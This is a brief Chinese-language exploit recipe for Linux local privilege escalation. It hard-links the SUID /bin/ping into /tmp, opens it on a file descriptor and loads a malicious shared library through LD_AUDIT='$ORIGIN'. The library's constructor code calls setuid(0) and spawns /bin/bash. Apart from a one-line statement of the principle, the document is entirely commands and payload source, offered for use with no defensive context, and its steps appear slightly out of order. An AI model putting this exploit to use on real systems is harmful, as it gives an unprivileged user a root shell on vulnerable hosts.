原理:在Linux中,/tmp的权限是777,利用suid,
将一个带有suid权限的执行文件/bin/ping 硬链到/tmp的文件
cd /tmp/
mkdir exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -fr /tmp/exploit/
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
vim /tmp/payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}